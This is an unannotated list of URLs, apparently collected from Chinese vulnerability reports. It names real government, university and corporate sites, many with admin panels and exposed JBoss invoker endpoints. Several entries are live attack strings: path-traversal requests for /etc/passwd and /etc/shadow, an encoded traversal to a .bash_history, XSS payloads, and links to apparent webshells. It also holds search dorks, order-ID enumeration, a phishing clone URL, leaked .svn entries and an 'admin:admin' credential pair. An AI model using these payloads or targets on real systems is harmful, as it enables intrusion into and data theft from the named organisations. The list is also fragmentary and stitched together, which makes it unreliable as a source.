http://www.udemy.com/blog) http://moffice.wo.com.cn//download.php?MenuID=2 http://120.132.57.124:8000/Public/login http://mail.dqghj.gov.cn/ http://weixin.lenovo.com.cn/weixin/index.php/shop/pay_create?openid=oLHCTjocHWBkc34TdXZEK0O8qPgg&proid=19159&flashsaleproductid=318&shopid=495 http://**.**.**/ http://**.**.**/ http://**.**.**/ http://211.147.239.62/ http://**.**.**/ http://**.**.**/ http://sdcdc.nlsense.com:8000/main.aspx http://mhjbyf.nlsense.com:6800/main.aspx www.hbxtgt.gov.cn http://jd.517na.com) http://jd.517na.com/HotelOrder/OrderQuery?txtOrderKeyId=&txtStartDate=2014-12-21&txtEndDate=2015-01-22&txtGuestName=&ddlOrderFlag=1&ddlOrderStatus=0&txtBuyerStatffId= http://www.gxeport.gov.cn:8080/pdms_qz/bayonetmanage/frm_makecard.aspx?pageindex=2 http://www.yixinfund.com/daogou/jjxq.php?code=470028%27 http://www.yixinfund.com/daogou/zdjj.php http://jjfz.ahu.edu.cn/manage/M_EditNoticeNews.aspx?id=51 http://211.147.239.62/ http://mp3.sogou.com/tiny/singer?singer_id=6028&singer_name=A-Lin http://mp3.sogou.com/tiny/singer?singer_id=6028&singer_name=A-Lin%3Cimg%20src=%22%22%3E%3C/img%3E http://www.vpclub.cn/about/index/id/1 http://www.cd315.gov.cn/zxgg.asp?typeid=4&bigclassid=18&smallclassid=50 http://www.cd315.gov.cn/admin/login.asp http://www.cd315.gov.cn/admin/uploadface.asp http://www.cd315.gov.cn/admin/Media.asp http://www.cd315.gov.cn/admin/flash.asp http://www.cd315.gov.cn/admin/Pic.asp http://www.cd315.gov.cn/upme1.htm http://www.cd315.gov.cn/upme2.htm http://mailaddr.chinaums.com/admin/main.php http://mailaddr.chinaums.com/admin/entry_chooser.php?form_element=export_form.dn&rdn=%3Cimg%20src=1%20onerror=alert%281%29%3E http://mailaddr.chinaums.com/addr/addr.php http://mailaddr.chinaums.com/admin/main.php http://mailaddr.chinaums.com/info.php https://60.215.8.97/login.html http://www.cnzxsoft.com http://1.93.0.110:28099/ http://sms.shenzhenair.com/system/loginMng.do?p_code=1770270091817700090181770910918754 http://admin.i2ya.com/login.aspx http://admin.i2ya.com/ufs/201501/41044fe6be8c4a6cace5f876b9fc10d4.aspx http://101.251.64.195:8080/ http://www.kfzx.gov.cn/wenzhang_xx.asp?ID=33021 http://www.kfzx.gov.cn/wenzhang_xx.asp?ID=33021 http://sqlmap.org url:http://zfxx.cq.gov.cn/zfxxgk/web/views/Show!index.action http://www.sz.csg.cn/axis2/axis2-web/HappyAxis.jsp http://www.surong100.com/question/ask.html页面的标题处, https://mail.travelzen.com/ http://116.213.76.41:8080/ http://www.jlucapp.cn:80/portal/companion/product-apply-json!cpFileUpload2.action http://www.jlucapp.cn/portal/shell.jsp http://www.jlucapp.cn:80/portal/companion/product-apply-json!cpFileUpload2.action?&redirect:http://www.baidu.com http://m.deppon.com/mow/user/saveInfo.jspa http://www.citicsf.com/recruitment/resume.jsp?id=26 http://58.56.128.121:8081/higreceipt/security/loginInit.action;jsessionid=8mUUt2dRZhojxFKYP7fQZeiHmhOOX7D6Ql38EAdhbbpnXHIruO4m!-1480944981 admin:admin http://oa.sinopharmholding.com/seeyon/index.jsp http://119.145.114.146:88/ http://124.202.144.177/ http://app-vtion.com/ckadmin/member/doLogin.action https://cms.autonavi.com/seeyon/index.jsp https://open.suning.com/api/toLogin.action https://open.suning.com/api/toDevCenter.action slave104:fserver2 master:fserver1 www.jsgjj.com.cn/gjj/index.action http://**.**.**/gjj/css.jsp http://www.jjxnh.com/administrator/ http://www.966009.com http://www.966009.com/client/newsshow/ViewHelp.aspx?city=1&helpid=239 http://www.966009.com/client/newsshow/ViewHelp_guding.aspx?helptype=W001&helpid=231&labname=%B1%BE%D5%BE%C9%F9%C3%F7 www.webcn.net/jtyyt/admin.data.php?sql=select%20*%20from%20sms_v3.tbl_lydt%20where%20FollowCode=%2701%27 http://**.**.**/business&un=%E7%AE%A1%E5%A5%BD%E4%BD%A0%E5%AE%B6%E7%8C%AB6 http://m.deppon.com/mow/user/editPassword.jspa https://yun.fangdd.com/basic/login/login http://yun.fangdd.com/basic/user/my http://www.umetrip.com/downloads/JspSpy.jsp http://www.umetrip.com/downloads/index.jsp http://szga.dailyss.com/PingXuan/default.aspx http://www.cyqhy.gov.cn/yeNewsInfo.asp?id=55 http://www.cyqhy.gov.cn/yeNewsInfo.asp?id=55 http://sqlmap.org http://home.focus.cn/product/dianping_9/ http://home.focus.cn/chanpinku/ajax/comment_agree.php?comment_id=4442&agree=agree http://demo.173cms.com http://www.deppon.com/user/toWriteNameEmail.action http://1.192.147.136:8000/jzdj/admin/loginout.do http://115.239.168.50:82/ http://219.132.130.113:88/ http://58.250.163.30:88/ http://103.25.65.51:88/ http://123.232.112.146:82/ http://61.187.6.149:81/ http://124.114.153.30/ http://121.15.212.2:5098/ http://113.108.151.58:88/ http://113.98.248.148:81/ http://119.57.20.84:8080/ http://116.228.8.26:8081/ http://113.140.18.210:8081/ http://61.188.207.135:81/ http://124.127.101.18:8080/ http://www.vpclub.cn/ http://club.qingdaonews.com/ http://www.travel.citic.com/enterprise_news_details.jsp?docid=6048 http://123.233.240.70:9080/ksbm/checkjx.do?xzqh=370126 http://www.sdwscgs.com:9080/zdwz/xwl.do?smid=02&bgid=01&bj=10 http://223.99.198.194:9080/ksbm/checkjx.do?xzqh=371422 http://223.99.198.194:9080/ksbm/checkjx.do?type=bm&code=371415 http://www.wfcgs.com:9080/ksbm/checkjx.do?xzqh=370700 http://www.lycgs.gov.cn:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://123.130.246.26:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://60.211.179.22:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://58.59.39.43:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://218.59.228.162/wscgs/xwl.do?smid=18&bgid=02&bj=8 http://cgs.ytjj.gov.cn:9061/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://222.134.200.57:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://123.233.240.70:9080/ksbm/checkjx.do?xzqh=370126 http://123.131.131.94:9080/wscgs/xwl.do?smid=15&bgid=01&bj=8 http://www.966009.com/CLIENT/newsshow/ViewNews.aspx?city=1&msgid=2170 http://oa.xbzx.cn/seeyon/main.do http://oa.xbzx.cn/seeyon/main.do?method=main http://www.zte-e.com/manage/MainFrom.aspx http://e.abchina.com/hn/ http://www.qdzqqh.org/newslist.aspx?typeid=dtjgdt%27 http://www.qdzqqh.org/shownews.aspx?newsid=224%27 http://www.qdzqqh.org/MemberListqy.aspx?q=4%27 http://www.qdzqqh.org/admin/login.aspx http://www.qdzqqh.org/public/qhjjr/login.aspx?usertype=1 http://www.qdzqqh.org/public/yxry/login.aspx?usertype=2 http://124.129.183.88/Default.aspx http://www.u86.com.cn/register.php?p=1 http://www.u86.com.cn/register.phpp=%27%3E%3CSCrIpT%3Ealert%28585%29%3C%2FScRiPt%3E http://gm.cm.sdo.com/seal/ https://github.com/tianmaying/node-blog-demo/blob/b47adea52e8e3f74d7e1a3079b656b73458ab014/utils/mailer.js https://mail.pku.edu.cn https://vpn.pku.edu.cn http://home.focus.cn/product/goods_3026/ http://home.focus.cn/product/goods_3026 http://home.focus.cn/product/goods_3026 http://www.oa8000.com/solution.htm http://demo.oa8000.com http://babylife.beingmate.com/admin.php/Main www.daqinghr.gov.cn http://www.daqinghr.gov.cn/fileDownload.jsp?fileName=/../../../../../etc/passwd http://www.daqinghr.gov.cn/fileDownload.jsp?fileName=/../../../../../etc/shadow http://www.pkusz.edu.cn/mailbox/admin/login.php http://www.dyp2p.com)的新业务,帝友云(http://www.diyou.cn) inurl:/get_col_first_message.jsp?fid http://www.jnq.gov.cn/get_col_first_message.jsp?fid=3101&id=29552 http://www.nmfzb.gov.cn/get_col_first_message.jsp?id=39733&fid=5695 http://www.cyzq.gov.cn/get_col_first_message.jsp?id=17437&fid=1948 http://www.fengzhen.gov.cn/get_col_first_message.jsp?id=50767&fid=6250 http://www.szwq.gov.cn/get_col_first_message.jsp?id=32073&fid=3392 http://www.chetdz.gov.cn/get_col_first_message.jsp?id=36885&fid=3781 http://www.jnq.gov.cn/get_col_first_message.jsp?fid=3101&id=29552 http://www.jnq.gov.cn/get_col_first_message.jsp?fid=3101&id=29552 http://haoma.uc.cn/unfreeze/checkAccount http://a.com/dz72/admincp.php?action=members&operation=newsletter&username=%2A&uid=0&srchemail=®datebefore=®dateafter=&postshigher=&postslower=®ip=&lastip=&lastvisitafter=&lastvisitbefore=&lastpostafter=&lastpostbefore=&birthyear=&birthmonth=&birthday=&lower[credits]=&lower[extcredits1]=&lower[extcredits2]=&higher[credits]=&higher[extcredits1]=&higher[extcredits2]= http://ldj.db.17173.com http://210.51.19.77/reports/ http://210.51.19.77/reports/ywjk.php?type=ivr http://210.51.19.77/reports/ywjklog.phptype=ivr&spc=10665106&serviceid=1259067391&oid=15 http://dev.bukkit.org/bukkit-plugins/dynmap http://www.baidu.com/s?wd=Minecraft%20Dynamic%20Map https://mobilegw.alipay.com/mgw.htm inurl:class_type.asp?a125id= http://www.ylove999.com/HXInfoChange/112/114.asp http://www.zssfxh.com//HXInfoChange/1/4.asp http://www.yuyaoschool.com/jgwmg/xmzfw/HXInfoChange/107/113.asp http://221.123.139.43:8080/ http://221.123.139.43:8080/eqframe.jsp http://mfw.uc.cn/download/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/home/jws/.bash_history url:http://xqwhgx.szlib.com/Index.action http://i.yixin.com/ http://houtai.vipshop.com/.svn/entries http://houtai.vipshop.com/111.html http://ico.58pic.com/ajax/download?format=ico&id=43511 http://ico.58pic.com/ajax/download?format=ico&id=43511可以下载一个图标文件,如果测试不正常就回报错,加单引号,查询语句和绝对路径都暴出来了,继续可以查到数据库安装路径系统类型等所有信息,这就比较好下手了 www.868e.com www.868e.com/manage http://www.hwtrip.com/ http://www.cdvcloud.com/ http://115.29.3.48 http://house.focus.cn/vote/noun.php?noun_name=sohu&proj_id=2037 http://esdmobile.lenovo.com.cn/ http://esdmobile.lenovo.com.cn/SDIMoblieWeb/Views/Account/PasswordRetrieve.aspx http://www.metadata.com.cn/ http://58.155.179.40:8088/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://202.206.242.26:88/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://58.155.179.40:8088/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://59.74.114.252:84/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://210.38.64.114:85/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://bwss.nlic.net.cn:8080/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://202.107.224.28:8080//poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://202.38.232.118:8080/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://rom.hztsg.com:9091/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://211.67.126.11:8088/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://210.32.33.245:8080/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://202.115.54.45:8080/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://202.115.54.45:8080/poweb/XunLanDownISO?flag=4xZswCF5&ISOID=37 http://bbs.liulanqi.baidu.com/属于特权域,如下图所示,可以成功在该域下执行特权API http://bbs.liulanqi.baidu.com/ http://pan.baidu.com的链接后,通过正则,匹配出链接后的JSON数据,parse后,未经过滤,即被拼接进入DOM中。 http://218.65.61.84/ www.inflight-media.cn/news.phpid=493 http://cha.17173.com/ http://cha.17173.com/dota2/trend.html www.orac.hainan.gov.cn:8081/travelstandard/login/loginInput.do https://**.**.**/ http://**.**.**/ 44.lvmaque.cn/tinvest/reward?id=2 http://www.lvmaque.cn/product/index.html http://www.lvmaque.cn/anli/index.html http://www.daiqile.com/fangan/看到,贷齐乐的P2C演示系统用的也是绿麻雀贷款系统: http://www.daiqile.com/fangan/ http://www.lifengnet.com/tinvest/reward?id=115 http://www.xzyinlian.cn/tinvest/reward?id=51 http://www.huiyip2c.com/tinvest/reward?id=45 http://dd.rongtianxia.com/tinvest/reward?id=48 http://t3.p2pzs.com/tinvest/reward?id=34 http://e.xdf.cn/Live-index-id-2325 http://122.11.49.93/ http://gl.yanxiu.com/ http://guanli.yanxiu.com/ http://122.11.49.93/ http://jsxx.gsedu.cn/ http://www.cqtzb.org.cn/bzxx/seexiangxi.aspx?id=39 http://www.jljgdj.org/MagazinePage.aspx?syear=2014&sqh=12 url:http://www.zjpost.com/gift/tbCardActive.action http://oa.zgcec.cn/paos/logon.action,打开中关村国家自主创新示范展示中心内部应用系统,如图所示: http://dbank.vmall.com/app/web/link/link_action.php?jsoncallback=jsonp1368989120166&action=list&uid=41986739&start=0&form=dbank_advance_link&size=20 http://visa.baicheng.com/order/detail/813114,813114这个六位数字遍历下即可。 http://visa.baicheng.com/order/detail/123222 http://visa.baicheng.com/order/detail/184924 http://visa.baicheng.com/order/detail/219991 http://visa.baicheng.com/order/detail/248811 http://cbadata.sports.sohu.com/images/players/500733.jpg/c.php http://www.ydh.cc/s/ url:http://hicwebchat.haier.net/chat-web/webchat.action http://116.228.70.229/toLogin.action http://223.2.10.24/cas/login.action http://www.njzb.net/HX_GetPassWord.asp http://sics.ynnu.edu.cn/articleview.aspx?id=278 http://zsb.ynnu.edu.cn/articleview.aspx?id=1 http://fao.ynnu.edu.cn/articleview.aspx?id=12 http://xnldjt.ynnu.edu.cn/articleview.aspx?id=531 http://gjxy.ynnu.edu.cn/articleview.aspx?id=87 http://huawen.ynnu.edu.cn/articleview.aspx?id=742 http://dawww.ynnu.edu.cn/articleview.aspx?id=72 http://xnldjt.ynnu.edu.cn/articleview.aspx?id=61 http://ein.ynnu.edu.cn/articleview.aspx?id=2 http://zzb.ynnu.edu.cn/articleview.aspx?id=44 http://jky.ynnu.edu.cn/articleview.aspx?id=94 http://lsxx.mca.gov.cn:9919/res/ http://lsxx.mca.gov.cn:9919/res/北京培训资料.rar http://lsxx.mca.gov.cn:9918/loginok.jsp?lg=2 http://211.86.195.15:8086/ggjs/zdjk/zdjkjg.jsp http://211.86.225.3:8090/ggjs/zdjk/zdjkjg.jsp http://218.241.174.148:8070/ggjs/zdjk/zdjkjg.jsp http://61.187.55.41:8090/ggjs/zdjk/zdjkjg.jsp http://www.kflib.cn:8089/ggjs/zdjk/zdjkjg.jsp http://lib.tongde.com:8089/ggjs/zdjk/zdjkjg.jsp http://58.133.216.9:8070/ggjs/zdjk/zdjkjg.jsp http://tsjs.sdwm.cn:8000/ggjs/zdjk/zdjkjg.jsp http://scsk.crsp.org.cn:8070/ggjs/zdjk/zdjkjg.jsp http://222.27.60.13/ggjs/zdjk/zdjkjg.jsp http://tsjs.ndjclib.com:8070/ggjs/zdjk/zdjkjg.jsp http://211.84.229.10:8089/ggjs/zdjk/zdjkjg.jsp http://tsjs.ndjclib.com:8070/ggjs/zdjk/zdjkjg.jsp http://211.84.229.10:8089/ggjs/zdjk/zdjkjg.jsp http://wooyun.org/bugs/wooyun-2015-089957的问题差不多 http://www.wooyun.org/bugs/wooyun-2010-077670 http://**.**.**/zjnj2011/Application/gongs.aspx http://**.**.**/Application/gongs.aspx http://**.**.**/sx2014/Application/gongs.aspx http://**.**.**/njbt2013/Application/gongs.aspx http://**.**.**/njbt2013/Application/gongs.aspx http://**.**.**/Njbt2013/Application/gongs.aspx http://**.**.**/xjnj2013/Application/gongs.aspx http://**.**.**/Application/gongs.aspx http://**.**.**/jl2013/Application/gongs.aspx http://**.**.**/2013/Application/gongs.aspx http://**.**.**/nybgj2013/Application/gongs.aspx http://**.**.**/sx2012/Application/gongs.aspx http://**.**.**/njbt2013/Application/gongs.aspx http://**.**.**/Application/gongs.aspx http://**.**.**/Application/gongs.aspx http://**.**.**/njgzbt2011/Application/gongs.aspx http://**.**.**/gznj2013/Application/gongs.aspx http://**.**.**/test2013/Application/gongs.aspx http://**.**.**/gsnjbt2012/Application/gongs.aspx http://**.**.**/2011/Application/gongs.aspx http://jjc.ynnu.edu.cn/shousuo.php http://zwxx.cjhy.gov.cn:8082/CHInfoPushPlat/login http://zwxx.cjhy.gov.cn:8082/CHInfoPushPlat/resources/uploadImageText/201501241118151240.jsp http://jsjy.ynnu.edu.cn/search.php http://www.qhxz.gov.cn/index/SpecialServ/ServList/ServShow/?id=46900200FG-SP-0002 http://www.bcgjj.com/tousu/visitshow.asp?id=7 http://news.cnpc.com.cn/search/search/ad/admin.php http://news.cnpc.com.cn/search/phpmyadmin/ http://z.jd.com/ http://lazycat8049.gicp.net/v98slg/meituan_login.html,而美团的登陆地址应该是https://passport.meituan.com/account/unitivelogin http://www.njztb.cn/complaint/visitshow.asp?id=5 http://115.28.222.71/Login.htm http://211.152.99.25:9080/ http://www.dameiweb.com/my/order-detail/order_id/0011 http://www.dameiweb.com/my/order-detail/order_id/0012 http://www.dameiweb.com/my/order-detail/order_id/4144 http://221.228.210.187:8161/admin/connections.jsp http://t.wxgx.cn/web.zip http://www.qizhinet.com/ www.dglik.com/QzkeyAdmin/ zs-2-1410.qzkey.cn/qzkeyAdmin/ zs.jsbc.edu.cn/qzkeyadmin/ article.hmwhw.gov.cn/qzkeyadmin/ www.lishisp.com/qzkeyAdmin/ www.s-m-e.net/QzkeyAdmin/ www.biokau.com/qzkeyAdmin/ www.lvhuahb.com/QzkeyAdmin/ www.hnluoshi.com/qzkeyadmin/ www.gwjysh.com/qzkeyadmin/ www.easyrich.cn/QzkeyAdmin/ http://www.easyrich.cn/QzkeyAdmin/ http://www.zzyzjg.com/qzkeyAdmin/ http://www.hhggw.com/qzkeyadmin/ http://www.hdkunzhan.com/QzkeyAdmin/ http://www.jsthjsgc.com/qzkeyadmin/ http://www.info-speed.com.cn/qzkeyadmin/ http://www.chinablx.cn/QzkeyAdmin/ http://www.xzyfls-edu.com/qzkeyadmin/ http://www.taso-tip.com/QzkeyAdmin/ http://www.aegon-cnooc.com.cn:80/ www.aegon-cnooc.com.cn http://lxcic.999.com.cn:8089/echannel/LoginAction.action;jsessionid=516E492CFA59E5DD1225B4FD13C4D4A8 http://fe.hy-la.com:8088/ http://oa.chnjcdc.com:9090/ http://oa.chinabed.com/ http://oa.suncorps.cn/ http://www.koyochem.com:9191/ http://124.129.26.94:7742/ http://oa.shunhengli.com:9090/ http://218.90.146.246:9090/ http://119.97.198.27:8080/ http://60.12.98.27/ http://221.123.142.231/ http://m.deppon.com/mow/client/index.html#/login/personInformation http://mail.sf-express.com.tw http://fax.kdsw.cn/fax/system/getWrite.action http://ts.21cn.com/htdocs.tar.gz整站下载 http://ts.21cn.com:8088/ThinkPHP/Conf/.svn/entries http://www.kaiyuanhotels.com/home/index.htm http://www.kaiyuanhotels.com/test.txt http://trs.kaiyuanhotels.com/orderFlow/schedule.htm http://eb.kaiyuanhotels.com/fwActivity/showList.htm http://www.quqike.com/user_center.asp整个url判断,所以csrf绕过。 url:http://enorthapi.zjol.com.cn:8084/subscription/pages/Subscription/subpage.do http://enorthapi.zjol.com.cn:8084/subscription/one8.jsp www.51job.com http://market.douban.com http://www.kouclo.com/login http://**.**.**/ http://www.ht8d.com/ http://www.bjtel.cn/phpmyadmin/ http://**.**.** https://www.manytour.com/member/order/102230.html https://www.manytour.com/vdata/editDs160/5545.html https://www.manytour.com/vdata/editDs160/5512.html http://i.maxthon.cn/,主要原因在于上次访问的地方,没有对访问的title进行过滤,导致可以写入一些html,当然,能写入html自然也就可以写入js了。 http://i.maxthon.cn http://i.maxthon.cn http://256a.qd256.com/ http://envir.sjtu.edu.cn/ http://envir.sjtu.edu.cn/TeachandStudy/FosterList.php?num=4&cnum=49&ID=49 http://envir.sjtu.edu.cn/DetailDownLoadInfo.php?num=60&cnum=201&ID=1265 http://drops.wooyun.org/papers/1426 http://180.169.55.173/Service/FlightQuery.aspx?strCul=en https://www.shodan.io/host/149.174.97.92 http://huffsmith-shared-a-atc.evip.aol.com/ http://shkxc.njnu.edu.cn:7080/keyan/login.jsp http://moffice.wo.com.cn/FCKeditor/editor/filemanager/connectors/test.html# http://moffice.wo.com.cn/userfiles/ http://moffice.wo.com.cn/download.php http://61.55.147.29:88/ inurl:list_v.php?sid= http://j.scedu.com.cn/list_v.php?offset=80&sid=03 http://www.jit.com.cn/ http://139.209.60.6//zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://218.62.90.168/zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://61.138.128.150:8080/zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://125.32.42.176/zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://139.209.60.6//zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://61.138.128.150:8080/zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.jlfm.gov.cn:8081/zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.jlfm.gov.cn:8081/zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://139.209.60.6//zwdtSjgl/ysq/depListDir.jsp?department_id=013521374&department_name=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.guolv.com/jdzs/show.php?id=4253 http://www.guolv.com/jdzs/show.php?id=4253 http://www.nbpf.gov.cn:8001/Admin/Login.aspx www.haxx.lss.gov.cn http://member.21so.com/index.php?m=admin http://113.106.58.73:8090 http://113.106.58.73:8088/jmx-console/ http://113.106.58.73:8088/invoker/JMXInvokerServlet http://www.shzfcg.gov.cn:8090/net/center/stocklogin.jsp www.shzfcg.gov.cn:8090 http://www.shzfcg.gov.cn:8090 http://yjsy.uibe.edu.cn/graduate/ http://graduate.ouc.edu.cn/ http://124.17.100.84/graduate/ http://www.jit.com.cn/ http://www.jlfm.gov.cn:8081/zwdtSjgl/ysq/depInfo_iframe.jsp?depid=013520945&depname=吉林市国土资源局丰满分局 http://139.209.60.6/zwdtSjgl/ysq/depInfo_iframe.jsp?depid=72676418-1&depname=市联通公司 http://61.138.128.150:8080/zwdtSjgl/ysq/depInfo_iframe.jsp?depid=013513569&depname=吉林市卫生局 http://218.62.81.171/zwdtSjgl/ysq/depInfo_iframe.jsp?depid=732561102&depname=磐石市经济局 http://222.160.175.90/zwdtSjgl/ysq/depInfo_iframe.jsp?depid=01358783-2&depname=柳河县发展和改革局 inurl:gaoquview.aspx?id= http://221.2.149.47:8100/gaoquview.aspx?id=220&newsid=1222&deptid=51 http://60.217.72.17:8000/gaoquview.aspx?id=220&newsid=1241&deptid=51 http://222.135.127.190:7000/gaoquview.aspx?id=220&newsid=1510&deptid=51 http://61.133.119.187:8089/gaoquview.aspx?id=220&newsid=1720&deptid=51 http://222.135.109.70:8100/gaoquview.aspx?id=220&newsid=1601&deptid=51 http://221.2.171.59:8000/gaoquview.aspx?id=220&newsid=1280&deptid=51 http://58.252.173.225:8088/invoker/JMXInvokerServlet http://58.252.173.225:8088/ http://58.252.173.225/webAuth/ jdbc:oracle:thin:@10.66.1.11:1521:orcl jdbc:oracle:thin:@localhost:1521:BSTEK http://crl.mcd.com/ http://cps.mcd.com/ http://diantai.ifeng.com/webcall/tv.php?aid=5&c=5&p=1&s=qzone http://124.207.102.86:8080/identify/catalog/show/1 http://gzgy.lss.gov.cn:8001/ http://gzgy.lss.gov.cn:8001/invoker/JMXInvokerServlet http://perc-sinano.com/en/rcdwShow.asp?id=28 http://www.hkcdc.cn/read.php?news_id=504 http://www.byd-auto.net/company/news.php?action=readnews&page=1&nid=155 http://www.jit.com.cn/ http://218.27.140.5/zwdtSjgl/Directory/depListXX.jsp?department_id=B02C579&department_name=%CA%E6%C0%BC%CA%D0%C3%F1%D5%FE%BE%D6&department_Type=1 http://218.27.190.107:8080/zwdtSjgl/Directory/depListXX.jsp?department_id=DE200804031151000109&department_name=%CA%D0%C3%F1%D5%FE%BE%D6&department_Type=1 http://www.jlfm.gov.cn:8081/zwdtSjgl/Directory/depListXX.jsp?department_id=AAB156&department_name=%B7%E1%C2%FA%C7%F8%BD%CC%D3%FD%BE%D6&department_Type=1 http://139.209.60.6/zwdtSjgl/Directory/depListXX.jsp?department_id=DE200804031235200968&department_name=%CA%D0%D0%C5%B7%C3%B0%EC&department_Type=1 http://61.138.128.150:8080/zwdtSjgl/Directory/depListXX.jsp?department_id=AA335&department_name=%BC%AA%C1%D6%BA%A3%B9%D8&department_Type=1 http://125.32.42.176/zwdtSjgl/Directory/depListXX.jsp?department_id=AA2B359&department_name=%F2%D4%BA%D3%CA%D0%D6%CA%C1%BF%BC%BC%CA%F5%BC%E0%B6%BD%BE%D6&department_Type=1 http://222.160.65.182:8000/zwdtSjgl/Directory/depListXX.jsp?department_id=4028818231752c5c013178d7f2f80049&department_name=%B7%F6%D3%E0%CA%D0%C8%CB%C1%A6%D7%CA%D4%B4%BA%CD%C9%E7%BB%E1%B1%A3%D5%CF%BE%D6&department_Type=1 http://222.160.65.182:8000/zwdtSjgl/Directory/depListXX.jsp?department_id=4028818231752c5c013178d47a5c0007&department_name=%B7%F6%D3%E0%CA%D0%B2%D0%C1%AA&department_Type=1 http://218.62.86.138/zwdtSjgl/Directory/depListXX.jsp?department_id=AAB248&department_name=%E8%EB%B5%E9%CA%D0%B3%A3%C9%BD%D5%F2%D5%FE%B8%AE&department_Type=1 http://58.244.248.90:81/zwdtSjgl/Directory/depListXX.jsp?department_id=4028816f33f8696e0133fd6a968b0105&department_name=%CB%AB%C1%C9%CA%D0%B9%A9%B5%E7%BE%D6&department_Type=1 http://218.27.140.5/zwdtSjgl/Directory/depListXX.jsp?department_id=B02C579&department_name=%CA%E6%C0%BC%CA%D0%C3%F1%D5%FE%BE%D6&department_Type=1 http://58.244.248.90:81/zwdtSjgl/Directory/depListXX.jsp?department_id=4028816f33f8696e0133fd6a968b0105&department_name=%CB%AB%C1%C9%CA%D0%B9%A9%B5%E7%BE%D6&department_Type=1 http://www.bydeurope.com/news/news.php?action=readnews&page=1&nid=195 http://218.21.32.100:8001/ecis/login.action http://218.21.32.100:8003/jmx-console/ http://bidding.sdic.com.cn:8080/projectname/reglogins/entity/iczsupplyreginfo/index.do http://bidding.sdic.com.cn:8080//guige.jsp http://61.150.72.184:9090/login.jsp http://61.150.72.184:8080/ http://61.150.72.184:9090/invoker/JMXInvokerServlet http://xxs.zxtaxt.com/login.asp http://www.inspur.com/ http://www.website.com/DocCenterService/image?photo_size=&photo_id=1 http://shop.inspur.com/ecweb/bj/ http://shop.inspur.com/ecweb/erp/ http://shop.inspur.com/ecweb/stb/ http://shop.inspur.com/ecweb/led/ http://shop.inspur.com/ecweb/cloud/ http://shop.inspur.com/DocCenterService/image?photo_size=../../../../../../../../../../etc/passwd%00&photo_id=1 http://shop.inspur.com/DocCenterService/image?photo_size=../../../../../../../../../../etc/shadow%00&photo_id=1 http://www.postbuy.com.cn/DocCenterService/image?photo_size=../../../../../../../../../../etc/passwd%00&photo_id=7719 http://www.onesgo.cn/DocCenterService/image?photo_size=../../../../../../../../../../etc/passwd%00&photo_id=45137 http://www.hhncpw.com/DocCenterService/image?photo_id=9943&photo_size=../../../../../../../../../../etc/passwd%00 